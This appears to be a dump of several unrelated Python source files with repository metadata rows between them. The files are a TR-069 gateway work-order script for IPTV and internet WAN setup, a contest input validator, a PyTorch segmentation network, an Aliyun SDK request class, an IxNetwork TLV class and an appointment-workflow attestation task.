    OTHER/IPTV WAN (bound to LAN2) on the device whose serial number is
    ``obj.sn``.  Progress text accumulates in ``obj.dict_ret['str_result']``
    and the function returns ERR_SUCCESS or ERR_FAIL.
    """
    sn = obj.sn # obtain the device serial number (SN)
    DeviceType = "LAN" # TR-069 template type to bind; only ADSL, LAN and EPON are supported
    AccessMode1_1 = 'PPPoE_Bridged' # dual-stack WAN access mode: PPPoE_Bridge, PPPoE, DHCP or Static
    AccessMode1_2 = ''
    AccessMode2 = 'PPPoE_Bridged' # IPTV WAN access mode: PPPoE_Bridge, PPPoE, DHCP or Static
    rollbacklist = [] # instances to delete if the work order fails; rollback is disabled by default
    # Initialize the progress log.
    obj.dict_ret.update(str_result=u"开始执行工单:%s........\n" %
                        os.path.basename(os.path.dirname(__file__)))
    # INTERNET data
    PVC_OR_VLAN1 = obj.dict_data.get("PVC_OR_VLAN1")[0] # ADSL uplinks use the PVC value; LAN and EPON uplinks use the VLAN value
    X_CT_COM_LanInterface1 = obj.dict_data.get("X_CT_COM_LanInterface1")[0]
    #X_CT_COM_ServiceList1 = obj.dict_data.get("X_CT_COM_ServiceList1")[0]
    ret, X_CT_COM_LanInterface1 = ParseLANName(X_CT_COM_LanInterface1)
    if ret == ERR_FAIL:
        info = u'输入的X_CT_COM_LanInterface参数错误'
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        return ret
    # Force the enable action to be issued together with the parameters.
    WANEnable_Switch1 = False
    # IPTV data
    PVC_OR_VLAN2 = obj.dict_data.get("PVC_OR_VLAN2")[0] # ADSL uplinks use the PVC value; LAN and EPON uplinks use the VLAN value
    X_CT_COM_MulticastVlan = obj.dict_data.get("X_CT_COM_MulticastVlan")[0] # newly added: issue the shared multicast VLAN
    # WANPPPConnection node parameters.
    # NOTE: some V4 firmware builds do not implement the X_CT-COM_IPMode node,
    # so it must not be enabled (1); real-world work orders do not issue it either.
    LAN2 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2' # bind to LAN2
    WANEnable_Switch2 = 1
    # PVC_OR_VLAN
    if PVC_OR_VLAN1 == "":
        PVC_OR_VLAN1_flag = 0
    else:
        PVC_OR_VLAN1_flag = 1
    if PVC_OR_VLAN2 == "":
        PVC_OR_VLAN2_flag = 0
    else:
        PVC_OR_VLAN2_flag = 1
    # INTERNET dict data: each value is [issue-this-parameter flag, value].
    dict_wanlinkconfig1 = {'X_CT-COM_Enable':[0, 'Null'],
                           'X_CT-COM_Mode':[PVC_OR_VLAN1_flag, '2'],
                           'X_CT-COM_VLANIDMark':[PVC_OR_VLAN1_flag, PVC_OR_VLAN1],
                           'X_CT-COM_802-1pMark':[1, '0']}
    # WANPPPConnection node parameters.
    # NOTE: some V4 firmware builds do not implement the X_CT-COM_IPMode node,
    # so it must not be enabled (1); real-world work orders do not issue it either.
    dict_wanpppconnection1_1 = {'Enable':[1, '1'],
                        'ConnectionType':[1, 'PPPoE_Bridged'],
                        'Name':[0, 'Null'],
                        'Username':[0, 'Null'],
                        'Password':[0, 'Null'],
                        'X_CT-COM_LanInterface':[1, X_CT_COM_LanInterface1],
                        'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null'],
                        'X_CT-COM_ServiceList':[1, "INTERNET"],
                        'X_CT-COM_IPMode':[1, '3'],
                        'X_CT-COM_IPv6IPAddressOrigin':[0,'Null'],
                        'X_CT-COM_IPv6PrefixOrigin':[0,'Null'],
                        'X_CT-COM_IPv6PrefixDelegationEnabled':[0,'Null'],
                        'X_CT-COM_MulticastVlan':[0, 'Null']}
    dict_wanipconnection1_1 = {}
    dict_wanpppconnection1_2 = {}
    dict_wanipconnection1_2 = {}
    dict_v6config = {}
    dict_v6prefixinformation = {}
    dict_dhcpv6server = {}
    dict_routeradvertisement = {}
    # IPTV dict data
    dict_wanlinkconfig2 = {'X_CT-COM_Enable':[0, 'Null'],
                           'X_CT-COM_Mode':[PVC_OR_VLAN2_flag, '2'],
                           'X_CT-COM_VLANIDMark':[PVC_OR_VLAN2_flag, PVC_OR_VLAN2],
                           'X_CT-COM_802-1pMark':[1, '0']}
    if X_CT_COM_MulticastVlan == "":
        X_CT_COM_MulticastVlan_flag = 0
    else:
        X_CT_COM_MulticastVlan_flag = 1
    dict_wanpppconnection2 = {
            'ConnectionType':[1, 'PPPoE_Bridged'],
            'Name':[0, 'Null'],
            'Username':[0, 'Null'],
            'Password':[0, 'Null'],
            'X_CT-COM_LanInterface':[1, LAN2],
            'X_CT-COM_ServiceList':[1, 'OTHER'],
            'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null'],
            'X_CT-COM_IPMode':[0, 'Null'],
            'X_CT-COM_MulticastVlan':[X_CT_COM_MulticastVlan_flag, X_CT_COM_MulticastVlan],
            'Enable':[1, '1']}
    dict_wanipconnection2 = {}
    dict_root = {'IGMPEnable':[1, '1'],
                 'ProxyEnable':[0, 'Null'],
                 'SnoopingEnable':[0, 'Null']}
    # WANIPConnection node parameters.
    # Query or enable PPPoE IP_Routed internet access.
    ret, ret_data = V6WANSetUP(obj,sn, WANEnable_Switch1, DeviceType,
                       AccessMode1_1, PVC_OR_VLAN1, AccessMode1_2, dict_wanlinkconfig1,
                       dict_wanpppconnection1_1, dict_wanipconnection1_1,
                       dict_wanpppconnection1_2,dict_wanipconnection1_2,
                       dict_v6config,dict_v6prefixinformation,
                       dict_dhcpv6server,dict_routeradvertisement,
                       change_account=0,
                       rollbacklist=rollbacklist)
    # Append the work-order step's result text to obj's accumulated result.
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
    # On failure, invoke the unified rollback mechanism (disabled by default).
    if ret == ERR_FAIL:
        info = u'开通上网失败\n'
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
        info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
        return ret
    # Enable the PPPoE_Bridged OTHER bridged IPTV WAN and bind it to LAN2.
    ret, ret_data = IPV6IPTVEnable(obj, sn, WANEnable_Switch2, DeviceType,
                                AccessMode2, PVC_OR_VLAN2, dict_root,
                                dict_wanlinkconfig2, dict_wanpppconnection2,
                                dict_wanipconnection2, change_account=1,
                                rollbacklist=rollbacklist)
    # Append the work-order step's result text to obj's accumulated result.
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
    # On failure, invoke the unified rollback mechanism (disabled by default).
    if ret == ERR_FAIL:
        ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
        obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
    info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
    obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
    return ret
if __name__ == '__main__':
    # Standalone smoke test for the work order. The original used Python-2-only
    # print statements and "except Exception, e"; single-argument parenthesized
    # prints and a non-binding except behave identically on Python 2 and also
    # parse on Python 3.
    log_dir = g_prj_dir
    log.start(name="nwf", directory=log_dir, level="DebugWarn")
    log.set_file_id(testcase_name="tr069")
    obj = MsgWorklistExecute(id_="1")
    obj.sn = "201303051512"
    # NOTE(review): this sample data lacks "X_CT_COM_LanInterface1" and
    # "X_CT_COM_MulticastVlan", which test_script reads -- it may be stale.
    dict_data= {"PVC_OR_VLAN1":("PVC:0/65","1"),
                "Username":("tw1","2"),"Password":("tw1","3"),
                "IPv6IPAddressOrigin":("AutoConfigured","5"),
                "IPv6PrefixOrigin":("PrefixDelegation","6"),
                "IPv6PrefixMode":("WANDelegated","7"),
                "IPv6Prefix":("2001:1:2:3::/64","8"),
                "IPv6DNSConfigType":("WANConnection","9"),
                "IPv6DNSServers":("fe80::1","10"),
                "DHCPv6ServerEnable":("1","11"),
                "DHCPv6ServerMinAddress":("0:0:0:1","12"),
                "DHCPv6ServerMaxAddress":("ffff:ffff:ffff:fffe","13"),
                "RouterAdvEnable":("1","14"),
                "AdvManagedFlag":("1","15"),
                "AdvOtherConfigFlag":("1","16"),
                "PVC_OR_VLAN2":("","17"),
                "ProxyServer":("172.24.55.67","19"),
                "ProxyServerPort":("5060","20"),
                "RegistrarServer":("172.24.55.67","21"),
                "RegistrarServerPort":("5060","22"),
                "OutboundProxy":("0.0.0.0","23"),
                "OutboundProxyPort":("5060","24"),
                "X_CT_COM_Standby_ProxyServer":("172.24.55.67","25"),
                "X_CT_COM_Standby_ProxyServerPort":("5060","26"),
                "X_CT_COM_Standby_RegistrarServer":("172.24.55.67","27"),
                "X_CT_COM_Standby_RegistrarServerPort":("5060","28"),
                "X_CT_COM_Standby_OutboundProxy":("0.0.0.0","29"),
                "X_CT_COM_Standby_OutboundProxyPort":("5060","30"),
                "AuthUserName1":("55511021","31"),
                "AuthPassword1":("55511021","32")}
    obj.dict_data = dict_data
    try:
        ret = test_script(obj)
        if ret == ERR_SUCCESS:
            print(u"测试成功")
        else:
            print(u"测试失败")
        print("****************************************")
        print(obj.dict_ret["str_result"])
    except Exception:
        print(u"测试异常")
"[email protected]"
] | |
c430b520d8077c08d1f2dad4a4e255d079ae8da2 | 4546398a18590e4e182629fb55d185547dd6df0a | /2015/beta/problems/demantar/input_format_validators/validator.py | bff24165ef084214f3ab7989be22df6477c131b1 | [] | no_license | ForritunarkeppniFramhaldsskolanna/Keppnir | 352341fa97c6349af65b513c03171f3e706f7db2 | 65c8eb5358d8a49f956edf76c2d47b9372accc3c | refs/heads/master | 2023-04-28T15:33:36.396225 | 2023-04-23T15:00:15 | 2023-04-23T15:00:15 | 78,303,702 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | import sys
import re
import string
s = sys.stdin.readline()
assert re.match('^[0-9]+ .\n$', s)
s = s[:-1]
n, c = s.split(' ', 1)
n = int(n)
assert 1 <= n <= 500
assert len(c) == 1
assert c in string.printable and c not in string.whitespace
assert sys.stdin.read() == ''
sys.exit(42)
| [
"[email protected]"
] | |
3ac2d633ab9dcb1d8b617c819a20e45565fc5fa4 | d01f9ff2d7ba3c7c99158678adeaf082f3f15dbc | /model/cpn/ablation_study/cityscapes.cpn.R101_v1c.v2/network.py | e1e8c9f9b049a87dd56a998ac77b7ba565d5ba93 | [
"MIT"
] | permissive | akinoriosamura/TorchSeg-mirror | d8e76d99e80d55c2555f4f8f7a7fc3f30ef5dec4 | 34033fe85fc24015bcef7a92aad39d2a25a001a5 | refs/heads/master | 2021-06-18T15:47:00.946788 | 2019-10-26T04:46:07 | 2019-10-26T04:46:07 | 217,657,156 | 0 | 0 | MIT | 2021-06-08T20:36:44 | 2019-10-26T04:46:39 | Python | UTF-8 | Python | false | false | 7,740 | py | # encoding: utf-8
from functools import partial
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
from config import config
from base_model import resnet101
from seg_opr.seg_oprs import ConvBnRelu
from seg_opr.loss_opr import AntimagnetLossv6
class CPNet(nn.Module):
    """Context Prior network: a dilated ResNet-101 backbone (output stride 8),
    an ``ObjectContext`` affinity module on the last stage, a main
    segmentation head and an auxiliary head on the stage-3 features."""
    def __init__(self, out_planes, criterion, pretrained_model=None,
                 norm_layer=nn.BatchNorm2d):
        super(CPNet, self).__init__()
        self.backbone = resnet101(pretrained_model, norm_layer=norm_layer,
                                  bn_eps=config.bn_eps,
                                  bn_momentum=config.bn_momentum,
                                  deep_stem=True, stem_width=64)
        # Replace strides with dilations in the last two stages so the
        # feature map stays at 1/8 resolution (see _nostride_dilate).
        self.generate_dilation(self.backbone.layer3, dilation=2)
        self.generate_dilation(self.backbone.layer4, dilation=4,
                               multi_grid=[1, 2, 4])
        self.business_layer = []
        self.context = ObjectContext(2048, 512, norm_layer)
        # ObjectContext returns cat([x, intra, inter]) = 2048 + 512 + 512
        # channels, which matches the 2048 + 1024 input expected here.
        self.head_layer = nn.Sequential(
            ConvBnRelu(2048 + 1024, 512, 3, 1, 1,
                       has_bn=True,
                       has_relu=True, has_bias=False, norm_layer=norm_layer),
            nn.Dropout2d(0.1, inplace=False),
            nn.Conv2d(512, out_planes, kernel_size=1)
        )
        self.aux_layer = nn.Sequential(
            ConvBnRelu(1024, 512, 3, 1, 1,
                       has_bn=True,
                       has_relu=True, has_bias=False, norm_layer=norm_layer),
            nn.Dropout2d(0.1, inplace=False),
            nn.Conv2d(512, out_planes, kernel_size=1)
        )
        # Layers trained from scratch; callers use this list to build
        # parameter groups with a larger learning rate.
        self.business_layer.append(self.context)
        self.business_layer.append(self.head_layer)
        self.business_layer.append(self.aux_layer)
        self.criterion = criterion
        self.bce_criterion = nn.BCELoss(reduction='mean')
        self.antimagnet_criterion = AntimagnetLossv6()
    def forward(self, data, label=None, aux_label=None):
        """Training (label given): return main + 0.4*aux + affinity losses.
        Inference (label is None): return the softmax segmentation map.
        ``aux_label`` is the target for the predicted intra-class affinity map.
        """
        blocks = self.backbone(data)
        fm, intra_sim_map = self.context(blocks[-1])
        fm = self.head_layer(fm)
        fm = F.interpolate(fm, scale_factor=8, mode='bilinear',
                           align_corners=True)
        softmax_fm = F.softmax(fm, dim=1)
        aux_fm = self.aux_layer(blocks[-2])
        aux_fm = F.interpolate(aux_fm, scale_factor=8, mode='bilinear',
                               align_corners=True)
        if label is not None:
            main_loss = self.criterion(fm, label)
            aux_loss = self.criterion(aux_fm, label)
            intra_sim_loss = self.bce_criterion(intra_sim_map, aux_label)
            antimagnet_loss = self.antimagnet_criterion(intra_sim_map,
                                                        aux_label)
            loss = main_loss + 0.4 * aux_loss + intra_sim_loss + antimagnet_loss
            return loss
        return softmax_fm
    def generate_dilation(self, module, dilation, multi_grid=None):
        """Apply ``_nostride_dilate`` to every block of ``module``.
        NOTE(review): ``dilation`` is reassigned each iteration, so with
        ``multi_grid`` the rates compound across blocks (e.g. base 4 with
        grids [1, 2, 4] yields 4, 8, 32 rather than 4, 8, 16) -- confirm
        this compounding is intended before changing it.
        """
        for idx, block in enumerate(module):
            if multi_grid is None:
                grid = 1
            else:
                grid = multi_grid[idx % len(multi_grid)]
            dilation = dilation * grid
            block.apply(partial(self._nostride_dilate, dilate=dilation))
    @staticmethod
    def _nostride_dilate(m, dilate):
        # Turn stride-2 convs into stride-1 and dilate 3x3 kernels so the
        # spatial resolution is preserved while the receptive field grows.
        if isinstance(m, nn.Conv2d):
            if m.stride == (2, 2):
                m.stride = (1, 1)
                if m.kernel_size == (3, 3):
                    m.dilation = (dilate // 2, dilate // 2)
                    m.padding = (dilate // 2, dilate // 2)
            else:
                if m.kernel_size == (3, 3):
                    m.dilation = (dilate, dilate)
                    m.padding = (dilate, dilate)
class SymmetricConv(nn.Module):
def __init__(self, in_channels, ksize, norm_layer=nn.BatchNorm2d):
super(SymmetricConv, self).__init__()
padding = ksize // 2
self.t1 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(ksize, 1),
stride=1, padding=(padding, 0))
self.t2 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(1, ksize),
stride=1, padding=(0, padding))
self.p1 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(1, ksize),
stride=1, padding=(0, padding))
self.p2 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(ksize, 1),
stride=1, padding=(padding, 0))
self.bn = norm_layer(in_channels)
self.relu = nn.ReLU()
def forward(self, x):
x1 = self.t1(x)
x1 = self.t2(x1)
x2 = self.p1(x)
x2 = self.p2(x2)
output = self.relu(self.bn(x1 + x2))
return output
class ObjectContext(nn.Module):
    """Context Prior head: predicts an intra-class affinity map over the
    feature map and uses it (and its complement) to aggregate intra- and
    inter-class context, which is concatenated back onto the input."""
    def __init__(self, in_channels, inner_channel, norm_layer=nn.BatchNorm2d):
        super(ObjectContext, self).__init__()
        self.in_channels = in_channels
        self.inner_channel = inner_channel
        self.reduce_conv = ConvBnRelu(self.in_channels, self.inner_channel,
                                      3, 1, 1,
                                      has_bn=True, has_relu=True,
                                      has_bias=False, norm_layer=norm_layer)
        # Predicts, for every spatial position, an affinity score to each of
        # the config.prior_size**2 prior positions.
        self.intra_similarity_branch = nn.Sequential(
            SymmetricConv(self.inner_channel, 11, norm_layer),
            nn.Conv2d(self.inner_channel, config.prior_size ** 2, 1, 1, 0,
                      groups=16, bias=False),
            norm_layer(config.prior_size ** 2)
        )
        self.intra_post_conv = ConvBnRelu(self.inner_channel,
                                          self.inner_channel,
                                          1, 1, 0, has_bn=True, has_relu=True,
                                          has_bias=False, norm_layer=norm_layer)
        self.inter_post_conv = ConvBnRelu(self.inner_channel,
                                          self.inner_channel,
                                          1, 1, 0, has_bn=True, has_relu=True,
                                          has_bias=False, norm_layer=norm_layer)
    def forward(self, x):
        """Return (cat([x, intra_context, inter_context]), affinity map).
        NOTE(review): the view/bmm/view sequence below is only consistent when
        the input's h*w equals config.prior_size**2 -- confirm that callers
        guarantee this (e.g. via a fixed crop size).
        """
        b, h, w = x.size(0), x.size(2), x.size(3)
        value = self.reduce_conv(x)
        intra_similarity_map = self.intra_similarity_branch(value)
        # Flatten to (b, h*w, P**2), transpose to (b, P**2, h*w) and squash
        # to (0, 1) so each entry acts as a soft intra-class indicator.
        intra_similarity_map = intra_similarity_map.view(b, h * w, -1)
        intra_similarity_map = intra_similarity_map.permute(0, 2, 1)
        intra_similarity_map = torch.sigmoid(intra_similarity_map)
        # The complement selects context from the other classes.
        inter_similarity_map = 1 - intra_similarity_map
        value = value.view(b, self.inner_channel, -1)
        value = value.permute(0, 2, 1)
        # Weighted aggregation of features, normalized by the prior area.
        intra_context = torch.bmm(intra_similarity_map, value)
        intra_context = intra_context.div(config.prior_size ** 2)
        intra_context = intra_context.permute(0, 2, 1).contiguous()
        intra_context = intra_context.view(b, self.inner_channel, *x.size()[2:])
        intra_context = self.intra_post_conv(intra_context)
        inter_context = torch.bmm(inter_similarity_map, value)
        inter_context = inter_context.div(config.prior_size ** 2)
        inter_context = inter_context.permute(0, 2, 1).contiguous()
        inter_context = inter_context.view(b, self.inner_channel, *x.size()[2:])
        inter_context = self.inter_post_conv(inter_context)
        output = torch.cat([x, intra_context, inter_context], dim=1)
        return output, intra_similarity_map
if __name__ == "__main__":
    # Smoke test. Bug fix: the original instantiated the undefined name
    # ``PSPNet`` (a NameError); this module defines ``CPNet``.
    model = CPNet(150, None)
    print(model)
| [
"[email protected]"
] | |
5c12ebb7f61530f208ff64d567d216355c3961ed | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-ens/aliyunsdkens/request/v20171110/DescribeEnsNetLevelRequest.py | 5057ac9282727831a8f7d7371a4b4a15f5899cdf | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 1,014 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeEnsNetLevelRequest(RpcRequest):
	"""RPC request wrapper for the ENS ``DescribeEnsNetLevel`` API (2017-11-10)."""

	def __init__(self):
		"""Register the product/version/action metadata and force HTTP POST."""
		super(DescribeEnsNetLevelRequest, self).__init__(
			'Ens', '2017-11-10', 'DescribeEnsNetLevel', 'ens')
		self.set_method('POST')
| [
"[email protected]"
] | |
9ba229cd899e1c098ef7cc34a315439025460288 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/tlvprofile/subtlv_7c94061598b794f7b720de3bb85f6cdb.py | e5a86fab5e949b33adb3d3d1d06e318bcc1731c0 | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,055 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class SubTlv(Base):
    """Sub Tlv container
    The SubTlv class encapsulates a list of subTlv resources that are managed by the system.
    A list of resources can be retrieved from the server using the SubTlv.find() method.
    """
    __slots__ = ()
    _SDM_NAME = 'subTlv'
    # Maps the Python-facing attribute names of this class to the REST
    # attribute names exchanged with the server.
    _SDM_ATT_MAP = {
        'Description': 'description',
        'EnablePerSession': 'enablePerSession',
        'IsEnabled': 'isEnabled',
        'Name': 'name',
    }
    _SDM_ENUM_MAP = {
    }
    def __init__(self, parent, list_op=False):
        super(SubTlv, self).__init__(parent, list_op)
    @property
    def Value(self):
        """
        Returns
        -------
        - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tlvprofile.value_ac1d7b13584a86b9cf1c28dca3390bca.Value): An instance of the Value class
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tlvprofile.value_ac1d7b13584a86b9cf1c28dca3390bca import Value
        # Reuse the locally cached child resource when present; otherwise
        # issue a select against the server.
        if self._properties.get('Value', None) is not None:
            return self._properties.get('Value')
        else:
            return Value(self)._select()
    @property
    def Description(self):
        # type: () -> str
        """
        Returns
        -------
        - str: Description of the tlv
        """
        return self._get_attribute(self._SDM_ATT_MAP['Description'])
    @Description.setter
    def Description(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['Description'], value)
    @property
    def EnablePerSession(self):
        # type: () -> 'Multivalue'
        """
        Returns
        -------
        - obj(ixnetwork_restpy.multivalue.Multivalue): Enable TLV per session
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnablePerSession']))
    @property
    def IsEnabled(self):
        # type: () -> bool
        """
        Returns
        -------
        - bool: Enables/disables this tlv
        """
        return self._get_attribute(self._SDM_ATT_MAP['IsEnabled'])
    @IsEnabled.setter
    def IsEnabled(self, value):
        # type: (bool) -> None
        self._set_attribute(self._SDM_ATT_MAP['IsEnabled'], value)
    @property
    def Name(self):
        # type: () -> str
        """
        Returns
        -------
        - str: Name of the tlv
        """
        return self._get_attribute(self._SDM_ATT_MAP['Name'])
    @Name.setter
    def Name(self, value):
        # type: (str) -> None
        self._set_attribute(self._SDM_ATT_MAP['Name'], value)
    def update(self, Description=None, IsEnabled=None, Name=None):
        # type: (str, bool, str) -> SubTlv
        """Updates subTlv resource on the server.
        This method has some named parameters with a type: obj (Multivalue).
        The Multivalue class has documentation that details the possible values for those named parameters.
        Args
        ----
        - Description (str): Description of the tlv
        - IsEnabled (bool): Enables/disables this tlv
        - Name (str): Name of the tlv
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
    def add(self, Description=None, IsEnabled=None, Name=None):
        # type: (str, bool, str) -> SubTlv
        """Adds a new subTlv resource on the json, only valid with config assistant
        Args
        ----
        - Description (str): Description of the tlv
        - IsEnabled (bool): Enables/disables this tlv
        - Name (str): Name of the tlv
        Returns
        -------
        - self: This instance with all currently retrieved subTlv resources using find and the newly added subTlv resources available through an iterator or index
        Raises
        ------
        - Exception: if this function is not being used with config assistance
        """
        return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
    def find(self, Description=None, IsEnabled=None, Name=None):
        # type: (str, bool, str) -> SubTlv
        """Finds and retrieves subTlv resources from the server.
        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve subTlv resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all subTlv resources from the server.
        Args
        ----
        - Description (str): Description of the tlv
        - IsEnabled (bool): Enables/disables this tlv
        - Name (str): Name of the tlv
        Returns
        -------
        - self: This instance with matching subTlv resources retrieved from the server available through an iterator or index
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
    def read(self, href):
        """Retrieves a single instance of subTlv data from the server.
        Args
        ----
        - href (str): An href to the instance to be retrieved
        Returns
        -------
        - self: This instance with the subTlv resources from the server available through an iterator or index
        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
    def get_device_ids(self, PortNames=None, EnablePerSession=None):
        """Base class infrastructure that gets a list of subTlv device ids encapsulated by this object.
        Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
        Args
        ----
        - PortNames (str): optional regex of port names
        - EnablePerSession (str): optional regex of enablePerSession
        Returns
        -------
        - list(int): A list of device ids that meets the regex criteria provided in the method parameters
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._get_ngpf_device_ids(locals())
| [
"[email protected]"
] | |
57b1d19b7a5e95e9e467c34419f47bb1f739192c | c124cd627d1cd2ecc2056a932db4c5c3203943f2 | /MPSAppt/core/containers/attest.py | 2536a3c36e1f8b87c51e74ab01d0f30f4dde7928 | [] | no_license | longooglite/mps | 8fb2093b6a9f483a2ce4543949f7cbf0b280a1f1 | fd8c0d1491b80074fdf5a8c923d50e55a1991ad0 | refs/heads/master | 2021-01-10T08:17:15.852252 | 2016-02-29T21:07:04 | 2016-02-29T21:07:04 | 52,824,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,311 | py | # [Copyright]
# SmartPath v1.0
# Copyright 2014-2015 Mountain Pass Solutions, Inc.
# This unpublished material is proprietary to Mountain Pass Solutions, Inc.
# [End Copyright]
from MPSAppt.core.containers.task import Task
import MPSAppt.services.attestService as attestSvc
import MPSAppt.services.jobActionService as jaService
import MPSAppt.services.uberGapService as uberGapSvc
import MPSAppt.utilities.environmentUtils as envUtils
import MPSCore.utilities.stringUtilities as stringUtils
class Attest(Task):
	def __init__(self, containerCode, parameterBlock):
		# Standard Task construction plus an empty attestation payload; the
		# real row is fetched lazily by loadInstance().
		Task.__init__(self, containerCode, parameterBlock)
		self.setAttestation({})
	# Initialization.
	def initializeOnNewJobAction(self, _jobAction, _personDict, _profile, _now, _username, doCommit=True):
		"""Hook run when a job action is created: set up item sharing, then
		try to reuse a recent valid attestation for the person (per the
		'findValidAttestation' init-item config); when none is found, send the
		configured directive e-mails instead.  Returns an actionInfo dict with
		grantCandidateAccess=True whenever a person record is present."""
		self.initializeItemSharingOnNewJobAction(_jobAction, _profile, _now, _username, doCommit=doCommit)
		actionInfo = {}
		if _personDict:
			initItems = self.getConfigDict().get('initItems',[])
			for initItem in initItems:
				if initItem.has_key('findValidAttestation'):
					findValidAttestation = initItem.get('findValidAttestation',[])
					for validAttestConfig in findValidAttestation:
						lookbackDays = validAttestConfig.get('lookbackDays',0)
						codes = validAttestConfig.get('codes')
						attestService = attestSvc.AttestService(self.getWorkflow().getConnection())
						validAttest = attestService.findViableAttest(codes,lookbackDays,_personDict)
						if validAttest:
							# Clone the prior attestation onto this job's task;
							# clearing 'id' forces an insert rather than an update.
							validAttest['updated'] = _now
							validAttest['id'] = None
							jobTask = jaService.JobActionService(self.getWorkflow().getConnection()).getOrCreateJobTask(_jobAction,self,_now,_username)
							validAttest['job_task_id'] = jobTask.get('id',-1)
							attestService.updateAttestation(jobTask,validAttest)
						else:
							# No reusable attestation: fall back to directive e-mails.
							emailConfigs = validAttestConfig.get('emails')
							if emailConfigs:
								self.sendDirectiveEmail(emailConfigs,_personDict,_jobAction,self,_now,_profile)
			actionInfo['grantCandidateAccess'] = True
		return actionInfo
# Getters/Setters.
def getAttestation(self): return self._attestationDict
def setAttestation(self, __attestationDict): self._attestationDict = __attestationDict
